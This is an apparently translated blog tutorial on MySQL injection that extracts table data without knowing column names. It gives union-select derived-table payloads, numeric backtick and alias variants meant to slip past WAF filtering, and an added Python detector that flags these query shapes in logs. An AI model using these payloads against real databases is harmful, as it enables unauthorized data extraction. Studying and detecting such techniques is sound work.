
Detailed explanation of MySQL injection without knowing the column names

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Preface

Recently I have been feeling empty: I was hunting for vulnerabilities just for the sake of hunting them, and going back to the technology itself makes me more comfortable. I won't say more; let's look at the details.

Premise

The following applies to MySQL < 5, or to MySQL >= 5 [where the information_schema database exists], when the database name and table name have already been obtained:

① Only the table name can be obtained, but not the column names, or only column names with no useful content [e.g. id] can be obtained.

② You want to obtain the structure of other tables (table names, column names, etc.) through the tables in the information_schema database, but references to that database are filtered out by a WAF.

In fact, I feel that this method is more practical for versions below 5, because I usually give up when I encounter a WAF (I really am a noob, 23333).

Solution

Normal query:

The following normal query returns the contents of the user table in the test database:

Select * from user

UNION query:

Select 1, 2, 3, 4 union select * from user

Query for numeric corresponding columns:

Columns can be queried by number: in the derived table, the literals 1, 2, 3, 4 of the first select become the column names, so for example `2` corresponds to the name column in the table.

Select `2` from (select 1, 2, 3, 4 union select * from user) a

Alias instead of query:

When the backtick ` cannot be used, an alias can be used instead, for example by giving column 2 the alias b:

Select b from (select 1, 2 as b, 3, 4 union select * from user) a

Multi-column merge query:

As above: if backticks cannot be used here, aliases can be used instead.

Select concat(`2`, 0x3a, `3`) from (select 1, 2, 3, 4 union select * from user) a limit 1
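
For detection, the statements above share two shapes that rarely appear in application queries: a derived table seeded with a literal-only select that is unioned with select *, and backtick-quoted numeric identifiers. The following Python code is an added example, not part of the original article; it flags both shapes in query-log text, and the pattern names and sample statements (including the archive_user table) are constructed for illustration.

```python
import re

# A literal (number, hex, string, NULL) with an optional alias such as "2 as b".
LITERAL = r"(?:\d+|0x[0-9a-f]+|'[^']*'|null)(?:\s+(?:as\s+)?[a-z_]\w*)?"

# Shape 1: "(select <literals only> union [all] select * from ..." in a derived table.
SEEDED_UNION = re.compile(
    r"\(\s*select\s+" + LITERAL + r"(?:\s*,\s*" + LITERAL + r")*"
    r"\s+union\s+(?:all\s+)?select\s+\*\s+from\b",
    re.IGNORECASE,
)
# Shape 2: a backtick-quoted identifier made only of digits, e.g. `2`.
NUMERIC_IDENT = re.compile(r"`\d+`")


def classify(query):
    """Return the names of the heuristics that the statement text triggers."""
    hits = []
    if SEEDED_UNION.search(query):
        hits.append("literal-seeded-union-derived-table")
    if NUMERIC_IDENT.search(query):
        hits.append("numeric-backtick-identifier")
    return hits


# Constructed statements, as they might appear in a MySQL general query log.
SAMPLE_LOG = [
    "select * from user where id = 7",
    "select `2` from (select 1, 2, 3, 4 union select * from user) a",
    "select b from (select 1, 2 as b, 3, 4 union select * from user) a",
    "select concat(`2`, 0x3a, `3`) from (select 1, 2, 3, 4 union select * from user) a limit 1",
    "select name from user union select name from archive_user",
]


def scan(lines):
    """Map each flagged statement to the heuristics it triggered."""
    return {q: classify(q) for q in lines if classify(q)}


if __name__ == "__main__":
    for q, hits in scan(SAMPLE_LOG).items():
        print(hits, "<-", q)
```

These are text heuristics over logged statements, so they complement parameterized queries rather than replace them; the alias variant is caught only by the first pattern because it contains no backticks.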

Only for translation and collation of ideas

Original link: https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

Summary

The above is the whole content of this article. I hope the content of this article has a certain reference and learning value for everyone's study or work. Thank you for your support.
